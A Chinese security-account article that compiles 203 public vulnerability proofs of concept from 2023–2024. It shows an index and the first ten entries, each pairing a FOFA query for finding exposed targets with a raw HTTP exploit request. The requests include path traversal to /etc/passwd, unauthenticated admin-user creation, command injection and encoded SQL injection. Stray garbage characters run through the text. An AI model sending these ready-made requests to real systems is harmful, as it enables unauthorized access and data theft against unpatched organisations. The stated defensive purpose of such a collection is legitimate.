互联网公开漏洞整理202309-202406% n+ c) O: D& F: I) c/ P. A6 K9 D
道一安全 2024-06-05 07:41 北京
! a& x+ ?9 t. \* R% l以下文章来源于网络安全新视界 ,作者网络安全新视界6 P3 t, z2 a1 ^ y$ l# v
+ c6 O8 y% ?6 A5 j0 F
发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。9 H+ ?' Q- M* n6 R
! I- ?% |% P/ t漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。7 g! }, U0 x# B# d/ T; A% q/ X
7 F; L8 \6 y! C) g2 `' n
安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。7 L6 {2 ], `9 i) K
3 A) O: ~2 i2 Y* h
文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。
' Z2 B8 _0 ^* N% H, e2 b7 [0 d+ g/ D+ K' Q2 @, A
合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。
7 ~" i! ~* G& _+ [( U5 m0 U
8 r( D$ ^1 {# k. C+ x' `: T
3 `, W4 d1 J: Z" S; m4 E7 h6 P2 k$ d声明
" ^+ {. g- j) b0 h/ h: {( W, q) r, Q* A4 L/ X: {3 N, n! `; n
为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。* a1 T% Q2 `) [ `$ r$ I9 P1 T' m6 F# Y
6 G; l; w# H' D# o" g$ T& E5 U有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。2 M o/ l I W- @
2 l `9 \* g# |. }% ?+ z. w+ Y* R2 F8 G5 S! Y- ]
3 r: Q5 W( k1 e. W7 [- k, I$ {& v目录
# t9 }' _( c8 a$ r2 \5 g6 K- o) G2 Q( C1 G& g
01) w9 r$ g* `( ^( i* D% D) k0 d0 G0 t
6 C H% R. T, p9 J1. StarRocks MPP数据库未授权访问; E! Y8 K P0 ~ e( ]* H3 a" F
2. Casdoor系统static任意文件读取
! C# s5 v( g* C. x! j- w3. EasyCVR智能边缘网关 userlist 信息泄漏
0 s* l S! ~( W/ X0 k' s4. EasyCVR视频管理平台存在任意用户添加
5 h& i3 ~: c% Z: @" d2 P5. NUUO NVR 视频存储管理设备远程命令执行
R! W. n! `$ v, Q6. 深信服 NGAF 任意文件读取$ ~4 V# C$ @4 {% {
7. 鸿运主动安全监控云平台任意文件下载) d! P' P/ k& }3 y+ u
8. 斐讯 Phicomm 路由器RCE
; `$ D2 Z5 U$ e* |9. 稻壳CMS keyword 未授权SQL注入
( ]. d' P; S5 Y8 ~10. 蓝凌EIS智慧协同平台api.aspx任意文件上传4 O9 n* t6 a7 k7 s
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
0 ]5 L1 G' q+ @3 `12. Jorani < 1.0.2 远程命令执行5 a9 M+ D. A; k. O
13. 红帆iOffice ioFileDown任意文件读取# f: ]" q; C) Q& B. M7 d2 w
14. 华夏ERP(jshERP)敏感信息泄露
2 E d P+ R. L- C+ S- }& K15. 华夏ERP getAllList信息泄露+ N* c' a/ K. R! B0 A- q
16. 红帆HFOffice医微云SQL注入
8 l5 _1 i# S. K7 K6 p6 @, C" [, N17. 大华 DSS itcBulletin SQL 注入+ |+ ^- l E: r0 O& e
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
/ |" j6 d8 E; C, A. b1 D: e: w19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
8 i: I; c" H& _; i- G( T20. 大华ICC智能物联综合管理平台任意文件读取 |" j% s# ? b" @" N
21. 大华ICC智能物联综合管理平台random远程代码执行
# o- H: o% A8 ]0 \8 h3 E+ L. y22. 大华ICC智能物联综合管理平台 log4j远程代码执行
$ p W5 G* j$ j23. 大华ICC智能物联综合管理平台 fastjson远程代码执行- H* M& [0 K2 T0 y$ m1 \( E
24. 用友NC 6.5 accept.jsp任意文件上传) z, j. B3 ?6 r* H' i, W0 O
25. 用友NC registerServlet JNDI 远程代码执行
1 S( y, C( r0 h( p; w, M9 V3 o: T* a26. 用友NC linkVoucher SQL注入. C: ]7 S5 o8 `6 N6 ?3 V* d
27. 用友 NC showcontent SQL注入# i2 ]5 I/ e' u* i
28. 用友NC grouptemplet 任意文件上传4 }( r. O& ~& C2 x6 K
29. 用友NC down/bill SQL注入3 m4 w7 j( e; k/ r
30. 用友NC importPml SQL注入% w, B, M m- o7 D
31. 用友NC runStateServlet SQL注入
. Q: s s! S: r1 L5 r0 ]32. 用友NC complainbilldetail SQL注入
( n9 B1 r) E. i E& v' _9 X6 ]33. 用友NC downTax/download SQL注入
6 l! @: i% O! `: c: L0 L: L34. 用友NC warningDetailInfo接口SQL注入6 s: p- v X1 \ p9 V
35. 用友NC-Cloud importhttpscer任意文件上传
8 ]/ }3 y/ L6 a36. 用友NC-Cloud soapFormat XXE
7 n2 ~! e5 o( ]+ _ l0 a$ ~/ l. g37. 用友NC-Cloud IUpdateService XXE$ ?2 c( |; z, w8 X4 o
38. 用友U8 Cloud smartweb2.RPC.d XXE
) ?. \6 h! Y U, a5 X39. 用友U8 Cloud RegisterServlet SQL注入 T7 f4 W3 U$ w2 W1 n, s2 A
40. 用友U8-Cloud XChangeServlet XXE7 m, w- H! u. @* r( N' d
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
1 E0 r' @- }2 t W, P- _- K1 p42. 用友GRP-U8 SmartUpload01 文件上传
' ?. A# ]# h# x6 s, ?43. 用友GRP-U8 userInfoWeb SQL注入致RCE# w9 |# n% h2 K0 X$ n, l# N+ v5 _
44. 用友GRP-U8 bx_dj_check.jsp SQL注入
' x: _" c( A' q) n45. 用友GRP-U8 ufgovbank XXE
/ G) Z3 v+ N, a; X, ^46. 用友GRP-U8 sqcxIndex.jsp SQL注入/ L' ?! q z5 D8 ^1 i) U+ ]4 j
47. 用友GRP A++Cloud 政府财务云 任意文件读取" k5 z6 _. u. M1 S
48. 用友U8 CRM swfupload 任意文件上传9 m. o' P# a) N/ x1 o( I+ v) Z
49. 用友U8 CRM系统uploadfile.php接口任意文件上传
8 h# C0 q: K. Q* ~; t6 s50. QDocs Smart School 6.4.1 filterRecords SQL注入2 ]+ v3 D0 I; Z/ H" T; H
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
- E) U3 }; a3 B( W& a2 ^. s T52. 泛微E-Office json_common.php sql注入
, b2 u& S4 v/ e# w& y& `- v53. 迪普 DPTech VPN Service 任意文件上传
! [1 y% Q5 ~7 M w54. 畅捷通T+ getstorewarehousebystore 远程代码执行: j3 X( \! Z* u# f: J2 N
55. 畅捷通T+ getdecallusers信息泄露; ]. C3 `( h% x: L6 p5 N) n
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
7 [- [6 Z( B( ]7 X) R0 s: r2 |57. 畅捷通T+ keyEdit.aspx SQL注入. {# B; L# o, K, I+ H9 d
58. 畅捷通T+ KeyInfoList.aspx sql注入 J+ V7 o# X# o P, [& Y& M& ]
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行+ q: h! ^4 ?( i% n1 |
60. 百卓Smart管理平台 importexport.php SQL注入1 w& |2 i% S8 G1 g
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传7 B+ H7 X* v# z
62. IP-guard WebServer 远程命令执行
3 q9 U# E& ? {6 j0 f63. IP-guard WebServer任意文件读取
2 u& p# {3 @- C" {) Y0 X64. 捷诚管理信息系统CWSFinanceCommon SQL注入
- a! @1 ?2 L" ]( f7 r( p& A65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过5 R" x- Z. i5 G& Q# J1 C
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
% h% }+ |! b6 s7 D: Q4 R67. 万户ezOFFICE wpsservlet任意文件上传) ?. O* E; G1 P6 P
68. 万户ezOFFICE wf_printnum.jsp SQL注入8 s- G/ j; Z' Y
69. 万户 ezOFFICE contract_gd.jsp SQL注入
/ K+ L1 ~2 u! G% {' I70. 万户ezEIP success 命令执行
; |# i0 K7 Q L- ]71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
3 G4 ]$ k$ }4 }72. 致远OA getAjaxDataServlet XXE
/ D# @! O9 G7 |' t$ j7 {! ]73. GeoServer wms远程代码执行" M- ]1 t3 ~+ _7 C# w1 u4 O
74. 致远M3-server 6_1sp1 反序列化RCE5 C# o" x8 x @4 L$ h
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE _. o& k: Q" j* Z
76. 新开普掌上校园服务管理平台service.action远程命令执行: ^8 a1 S- p u" H! c' k
77. F22服装管理软件系统UploadHandler.ashx任意文件上传
9 T( E: }6 Z% n0 y+ Y. z78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
9 `5 Y Y6 y. `, q, ^79. BYTEVALUE 百为流控路由器远程命令执行
& S4 H9 ^* f' {/ z80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传- ~8 M5 _+ T: _( x* q1 Q3 I/ ~5 z
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露+ a$ ~/ Q) p9 `# W( ^9 a7 |, p
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
% {3 ]4 e$ k7 L9 |! H" B* c) Z t83. JeecgBoot testConnection 远程命令执行: ~; k6 R/ m1 F: ?) T) M
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
0 @1 L. U3 Q A5 h85. SysAid On-premise< 23.3.36远程代码执行0 G. x7 w$ b+ }/ p; G
86. 日本tosei自助洗衣机RCE
0 c/ }% J; V" u9 A% d+ U; Y& x. F# u87. 安恒明御安全网关aaa_local_web_preview文件上传
( e2 t* Q ~9 s/ h3 C4 c! M88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行& x: n5 p! S; w* U& N0 d" T
89. 致远互联FE协作办公平台editflow_manager存在sql注入
& H6 C: Z* d+ [: J h3 r3 o0 ?+ ]90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
* o, P. Q' H, M) p @: `91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
+ h ?* j- N& j92. 海康威视运行管理中心session命令执行" ~" k+ N& @* e) `9 ?6 n5 B$ ~& o2 p
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传8 g6 x% g/ a2 F+ N8 m) q$ L5 Z
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
: q" m7 x3 N$ j8 Y) U95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行/ V5 B. t8 I5 z: J2 o
96. Apache OFBiz 18.12.11 groovy 远程代码执行8 ^7 D; [0 U9 c }- r
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
J4 d# ~: y. [% Q, X9 L98. SpiderFlow爬虫平台远程命令执行
' u1 {3 b9 Y5 M0 Z99. Ncast盈可视高清智能录播系统busiFacade RCE
! i j- ^4 }8 M* z+ `1 W- b4 s100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传2 P" `; y/ W1 h- w- n
101. ivanti policy secure-22.6命令注入
( R z" {% _; s& f/ U7 w' \102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行9 E8 q3 @7 p5 T" A1 v5 {/ h' x
103. Ivanti Pulse Connect Secure VPN XXE; X0 ~+ B( c( ^$ z g+ v; w
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露- ? }. f* @3 l( ~' l2 \' B
105. SpringBlade v3.2.0 export-user SQL 注入
7 d/ T( S4 A! ~4 i( z5 r$ e106. SpringBlade dict-biz/list SQL 注入& z, J2 I+ y9 b: W% M$ e
107. SpringBlade tenant/list SQL 注入# l' ?1 ~6 H+ [! L9 Z) z X$ H
108. D-Tale 3.9.0 SSRF
9 j' E( v1 i6 g% K8 ~109. Jenkins CLI 任意文件读取
; t+ O. z9 V6 Y6 a/ R110. Goanywhere MFT 未授权创建管理员1 W* p. A3 ]- j
111. WordPress Plugin HTML5 Video Player SQL注入
' j) r3 O4 T2 R112. WordPress Plugin NotificationX SQL 注入$ `: A) ]2 k F- }
113. WordPress Automatic 插件任意文件下载和SSRF
! `) i3 |% i4 |$ @+ S9 T114. WordPress MasterStudy LMS插件 SQL注入, Y" ?2 p# N! c$ E' E
115. WordPress Bricks Builder <= 1.9.6 RCE
& g9 H9 i$ V) X) R116. wordpress js-support-ticket文件上传
3 S R" O; J8 }* h9 x* ?8 b% y+ `117. WordPress LayerSlider插件SQL注入
% y: x; n# d2 h" V: G1 q118. 北京百绰智能S210管理平台uploadfile.php任意文件上传* R: s# u" u( M0 U- T& L/ }
119. 北京百绰智能S20后台sysmanageajax.php sql注入
( Z* c( y! b7 p L120. 北京百绰智能S40管理平台导入web.php任意文件上传
5 Z9 ?' [% T- n0 s) Y$ O121. 北京百绰智能S42管理平台userattestation.php任意文件上传5 n1 r3 Y$ K, Z7 v6 w9 S: n
122. 北京百绰智能s200管理平台/importexport.php sql注入
2 Q/ r8 ~8 R' h9 s123. Atlassian Confluence 模板注入代码执行, d- p. r9 D2 d" I
124. 湖南建研工程质量检测系统任意文件上传
7 ?2 L+ c" V' c* f0 f% u125. ConnectWise ScreenConnect身份验证绕过( u- d; a# Y( S! t; w7 p
126. Aiohttp 路径遍历3 s4 l, ]) |5 h" ~4 v" S
127. 广联达Linkworks DataExchange.ashx XXE
+ A; h8 Y3 z8 k" A5 g: T128. Adobe ColdFusion 反序列化7 j8 w5 m) W0 E9 i. ]0 l. Q) E4 |
129. Adobe ColdFusion 任意文件读取) c* j1 i) p- Y
130. Laykefu客服系统任意文件上传
/ [ I2 t( [8 _131. Mini-Tmall <=20231017 SQL注入3 @4 x$ V: b* h2 k1 \8 _- G T
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
( `1 |* h7 o& H/ Y+ {133. H5 云商城 file.php 文件上传
' U( S) r' ^% Q- J134. 网康NS-ASG应用安全网关index.php sql注入
" E: C" i* X7 e; t135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入. Z* v7 a" G) Y$ r3 D
136. NextChat cors SSRF; H! K, {% S4 l# A% n/ h. C
137. 福建科立迅通信指挥调度平台down_file.php sql注入
7 o# [# V1 h3 t2 S& H) C4 i138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
* m: [9 U0 Z6 x# F- f139. 福建科立讯通信指挥调度平台editemedia.php sql注入& x* A( ]/ X0 Z9 B3 q8 d
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
6 e+ c4 e" q+ I8 H: v' U# s141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
. ~3 q4 L$ a3 [, E142. CMSV6车辆监控平台系统中存在弱密码6 S# o! G8 R4 Y1 ` E4 {4 |. S6 K
143. Netis WF2780 v2.1.40144 远程命令执行
( E6 h+ ~ z" q2 R0 w4 `1 a, Z. ]144. D-Link nas_sharing.cgi 命令注入
4 Z. e! G) W0 c0 j145. Palo Alto Networks PAN-OS GlobalProtect 命令注入4 k: }, D3 i2 I6 `4 N
146. MajorDoMo thumb.php 未授权远程代码执行
" V# Q ?. T& M% h# L# w6 f8 d147. RaidenMAILD邮件服务器v.4.9.4-路径遍历1 X- @/ h* S3 ?
148. CrushFTP 认证绕过模板注入' D* |+ M9 p1 h) S _6 G7 y& I
149. AJ-Report开源数据大屏存在远程命令执行; H, u3 R% G. C1 C
150. AJ-Report 1.4.0 认证绕过与远程代码执行
" ]( |; Q' `1 h" Z9 E& _151. AJ-Report 1.4.1 pageList sql注入* Y5 r3 K3 a+ e7 I7 h
152. Progress Kemp LoadMaster 远程命令执行
" h# ?8 r+ r3 a+ I153. gradio任意文件读取8 f( ^, l3 n' V5 F; U) w6 @
154. 天维尔消防救援作战调度平台 SQL注入) P. e* v3 d3 z1 R: q. x, P
155. 六零导航页 file.php 任意文件上传
+ s) }4 Y' w0 O' p& Q# n& }156. TBK DVR-4104/DVR-4216 操作系统命令注入3 T- E( S. Y2 o9 O. x! H
157. 美特CRM upload.jsp 任意文件上传% {! W, T6 K- V( G* P
158. Mura-CMS-processAsyncObject存在SQL注入1 {2 S2 b0 W2 t- @4 R
159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传& ^/ i7 ]" H5 A) L- }
160. Sonatype Nexus Repository 3目录遍历与文件读取
2 l! S* s' D" C; Y% h161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传5 I" |. i$ S: ~* w9 G
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
) a, d! {! ^- u. W8 t. q8 V: F! j163. 号卡极团分销管理系统 ue_serve.php 任意文件上传 q3 f, C5 }! m6 ~: k8 r& d
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
) p6 f9 X$ x; ~5 r2 c165. OrangeHRM 3.3.3 SQL 注入
7 q% g, a; w1 t- D- j9 j# B166. 中成科信票务管理平台SeatMapHandler SQL注入% S9 r# m& M' J5 E! i3 M8 D- u
167. 精益价值管理系统 DownLoad.aspx任意文件读取+ e: G. G V7 g; x# y
168. 宏景EHR OutputCode 任意文件读取# b5 d! k3 h2 X3 u
169. 宏景EHR downlawbase SQL注入, |/ o% f$ p) C" Q# _, y4 f
170. 宏景EHR DisplayExcelCustomReport 任意文件读取
7 _5 K7 X2 G; G5 O- C4 H171. 通天星CMSV6车载定位监控平台 SQL注入* K5 h/ b: m: W; z, Z
172. DT-高清车牌识别摄像机任意文件读取
4 p5 Z3 c$ a6 _- F# H: Z4 {( D173. Check Point 安全网关任意文件读取8 m. x# O; @; |
174. 金和OA C6 FileDownLoad.aspx 任意文件读取1 ?7 m5 b, n" K, y1 h
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入6 y" b% v4 U, o8 E1 N% \: \; a" b
176. 电信网关配置管理系统 rewrite.php 文件上传& x. O" k4 g0 }1 T2 w3 n
177. H3C路由器敏感信息泄露
$ F% S- b( O* c5 ]178. H3C校园网自助服务系统-flexfileupload-任意文件上传
0 ]% `" j0 g/ C" L! _3 d179. 建文工程管理系统存在任意文件读取4 J6 N! I& r S
180. 帮管客 CRM jiliyu SQL注入
8 X" J' e; F9 O$ q181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
- \, {1 E; i F; g( l; ?182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建8 m& j% g4 R5 T, n; z1 u
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入- m: R- u7 @+ F6 S% i7 Z
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加! \8 X6 l( o7 d" i
185. 瑞友天翼应用虚拟化系统SQL注入& X" `3 |! o) W
186. F-logic DataCube3 SQL注入; M( I* ~- |, j
187. Mura CMS processAsyncObject SQL注入* B. q# C, X. S! }" j. w( O
188. 叁体-佳会视频会议 attachment 任意文件读取" ^- G( @1 C5 ^' L' j8 g! T; s
189. 蓝网科技临床浏览系统 deleteStudy SQL注入) T Z+ H/ R' F1 b' s# ^# p. l
190. 短视频矩阵营销系统 poihuoqu 任意文件读取
3 N4 s1 Z, e" q- [1 }9 s191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
3 s0 Z# g; a5 v3 K, b' p- |192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
5 e* M e' k) I/ E, F9 x/ y193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行9 ^3 N9 ^ X2 V4 n2 U1 a
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
8 y1 k i ~ I1 y% |9 M) ]8 e) x195. 飞鱼星上网行为管理系统 send_order.cgi命令执行4 L: I) c; j" M6 G( w
196. 河南省风速科技统一认证平台密码重置
& o) T, Y% Y& z8 H197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入) T! a$ z4 @2 T5 I2 e9 Y6 Z# O
198. 阿里云盘 WebDAV 命令注入& U; i& u" y' E" U( K
199. cockpit系统assetsmanager_upload接口 文件上传
# \3 e2 S7 x3 S* Q6 K4 Z' S" g200. SeaCMS海洋影视管理系统dmku SQL注入" w9 i. G/ r5 ^) }/ c7 H0 G
201. 方正全媒体新闻采编系统 binary SQL注入
9 d" P. v( J$ |1 x- r, W202. 微擎系统 AccountEdit任意文件上传
' ^( W0 s+ Y$ U d203. 红海云EHR PtFjk 文件上传
1 s7 W; k& c8 `8 x& f/ B( h& P: `$ g( L* O: n7 H1 A- E9 U5 V
POC列表
4 s/ o7 r r/ u4 W/ J" F3 d G8 c* Q% X ^9 g& g/ ^7 U
02
3 I; [, q/ M) t I1 ]6 N8 w" g+ V( E! l
1. StarRocks MPP数据库未授权访问: S; i3 z( w- v
FOFA :title="StarRocks"
- ?5 R& @1 ^$ `/ U" W% r- oGET /mem_tracker HTTP/1.1
2 Q* h, {) f4 T% A2 _0 ]9 M) x7 ?" sHost: URL
+ ^ W# r1 E4 @' B7 b6 N" f9 p: O
' K7 U, Y6 o7 D" \+ T8 x4 A0 B4 f' w8 ]+ C( ?% y) E7 @+ f) y& G
2. Casdoor系统static任意文件读取, S3 W7 a+ `; Z+ x5 E! `1 y' E
FOFA :title="Casdoor"
0 N* }- t( R6 X6 M V; AGET /static/../../../../../../../../../../../etc/passwd HTTP/1.1* Y/ t6 c! r% n `3 [* c5 x8 R
Host: xx.xx.xx.xx:9999, ?' M$ {3 n g) g
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
; L k& r) [. ]8 eConnection: close
! G1 D; B" h2 l# l7 SAccept: */*( _6 @: G8 c+ [" O7 }& S$ h( F
Accept-Language: en0 J: f7 @2 A9 n9 z2 b
Accept-Encoding: gzip
& L [3 @$ U6 V% s! q/ E$ j$ f
7 G) a5 O+ p: j' C6 R8 `+ m) |9 b6 }/ p: i) i% h
3. EasyCVR智能边缘网关 userlist 信息泄漏0 y1 T- l5 z9 d- N( [& |
FOFA :title="EasyCVR"' y2 i! }, b) q1 A' K3 b
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
6 J; U- u3 ~+ [4 BHost: xx.xx.xx.xx
; Y# N0 ^: L/ f* e1 J5 k
* \/ J+ S3 a( F! I: Y4 W) c5 e1 V' g4 j# }; b, L
4. EasyCVR视频管理平台存在任意用户添加
7 w1 t$ u2 M% r1 g9 uFOFA :title="EasyCVR"
9 b: p6 Z7 E& {$ d" k
4 {+ n% T) F; I0 ?* v" \password更改为自己的密码md5
" Y/ M6 O7 g' Z S1 dPOST /api/v1/adduser HTTP/1.14 {# W& G2 k4 F" w, G; M
Host: your-ip
$ x3 S- h- i) X: p* b; U" rContent-Type: application/x-www-form-urlencoded; charset=UTF-83 E: f0 t3 j$ D) N
4 s: n' q( W. h, Z% z {& ]" Aname=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1
1 _2 y) I5 h: {, f7 W
) N/ D+ M; ]7 P& W7 a, y' R( |$ T3 L* L2 r
5. NUUO NVR 视频存储管理设备远程命令执行
9 h2 t9 v) ^6 I3 o% A( j8 x" wFOFA:title="Network Video Recorder Login"
8 I7 ?, E. O* R) G6 Q; W2 d UGET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
& f4 W2 ~7 y7 W3 ~ o0 UHost: xx.xx.xx.xx
- \# r' d7 A& n0 A# h4 ]' U% b9 H- t- y) b( ~& D9 X' n) ]. }
1 q- k( u N8 ~4 c1 P
6. 深信服 NGAF 任意文件读取
1 z- x ?9 f! B( l, l. m: n+ c$ G' EFOFA:title="SANGFOR | NGAF"; R8 G. g5 N% M5 V( H
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1- p+ X; V9 L# U# N
Host:
6 @2 j/ ]4 _2 o+ a: Q( g( G3 z. Q6 j! y* [- e7 r
& @' x, v' l8 k z
7. 鸿运主动安全监控云平台任意文件下载
# E' b& H' n* _4 l5 b! x$ ]) ?& c0 wFOFA:body="./open/webApi.html"; I2 S& K6 U/ | m" h0 G& g* e5 n5 z
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
& Z, Y/ ~- l/ j% iHost:& l" @7 y3 A! K
% r& g3 I$ B1 U8 w
6 q% ^" U* b6 A) Y8. 斐讯 Phicomm 路由器RCE
5 u5 v8 L) @. l I9 \7 KFOFA:icon_hash="-1344736688") _' I, U& O8 I5 [) x+ ]8 H
默认账号admin登录后台后,执行操作
) g/ S" ?7 J* O6 r) s3 UPOST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
$ G( E' t' P, a+ C% H) eHost: x.x.x.x
; B5 A; ?( ]( e( B7 sCookie: sysauth=第一步登录获取的cookie
# U! w& O9 N! aContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
7 K+ I6 r$ J( t1 |( oUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.361 m$ ~- P5 _3 K a& r
4 w6 L3 ^; H ], S {" ?
------WebKitFormBoundaryxbgjoytz
& C1 [4 A" Y5 ZContent-Disposition: form-data; name="wifiRebootEnablestatus"
8 j% h. n0 i8 s& O; t* J( X D
$ u! E/ @( n: }%s
6 D* ^, T( c5 ?3 T( q6 R------WebKitFormBoundaryxbgjoytz
6 s% `9 t* x8 e% y: L: \. zContent-Disposition: form-data; name="wifiRebootrange"/ q8 C7 j5 X: M# @# e
7 y3 Z3 L4 i$ T. H) D+ Y12:00; id;! j" Z6 d4 B2 J# x$ `7 a4 ^
------WebKitFormBoundaryxbgjoytz2 ^( Q' Z0 Z# _8 p- Q) S
Content-Disposition: form-data; name="wifiRebootendrange". u$ i3 F/ u9 ^$ o4 ]9 Z
: x: L+ X$ @) g4 H2 w, E0 m1 J
%s:
, g* ~5 z) N: y------WebKitFormBoundaryxbgjoytz! B& w7 Z9 b$ N+ ~4 v4 b% s
Content-Disposition: form-data; name="cururl2"
+ F8 @2 `3 E$ i
& F8 m. ^/ Q; G+ K1 [/ ~, `9 z" i& B* \
------WebKitFormBoundaryxbgjoytz--
! X5 L A2 e0 q4 r0 L; V& O# X
$ N9 j1 v( V9 n
- \$ u- q! O" R& M4 E' \4 ]! p9. 稻壳CMS keyword 未授权SQL注入
0 V8 A7 u4 u5 Q, @% N5 XFOFA:app="Doccms"& D# q+ a8 O- T! s. p
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.11 Q1 M7 n& N1 {! J- O7 B; [
Host: x.x.x.x" |8 j- B9 g. L: f
( h9 E, @% T7 {, s) Z
/ e& a+ A0 y- Z3 v, Vpayload为下列语句的二次Url编码
& H: w6 z' Z& `4 h- j" |
: K, M0 _' |# R- N' C, B ?" N' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
) E) ]) h3 W D& l3 O. D6 B/ p' Z9 r4 x" b+ U3 N1 J6 Y2 _
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
5 g7 O+ E Y% q; b6 B! n0 k2 O9 E. pFOFA:icon_hash="953405444"
# {0 I% N! J# Z1 |# w M7 {' L: m3 n+ `! L; m
文件上传后响应中包含上传文件的路径
, ]" k- V4 m/ t- u. A) S5 VPOST /eis/service/api.aspx?action=saveImg HTTP/1.1
; [( a0 @3 p& G! G' GHost: x.x.x.x:xx
( g/ ^) o V, \! q0 ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
+ U2 U0 s) H4 V! AContent-Length: 197
8 k5 p, w8 t, u; ]: f/ ?. M& o! c( qAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9+ C, g. E. M# L8 d2 i: r
Accept-Encoding: gzip, deflate
9 j5 K2 E1 @/ B. L/ c+ E" h( DAccept-Language: zh-CN,zh;q=0.9
. W- f3 h( }' h4 r; a; E6 \Connection: close
, g6 v$ u$ W# o! I' m- ^, pContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
- a" X- @) K; R: v8 {# H
: _/ G7 i- _' w: C------WebKitFormBoundaryxdgaqmqu: n2 z) ~0 k& [) |$ ^
Content-Disposition: form-data; name="file"filename="icfitnya.txt"$ ~" Y7 U+ L) q! w1 [! s' ~* l! ]
Content-Type: text/html( C! w% F u# J# N! H: }% }
6 Y- b( D8 E" j G7 G" q' a) ?! Rjmnqjfdsupxgfidopeixbgsxbf
v/ W2 R4 @. w, ]2 b% c$ l+ V. |------WebKitFormBoundaryxdgaqmqu--# n+ j9 G6 U9 N% E- S# w: L
5 S/ w( X! N, U( J; k* t
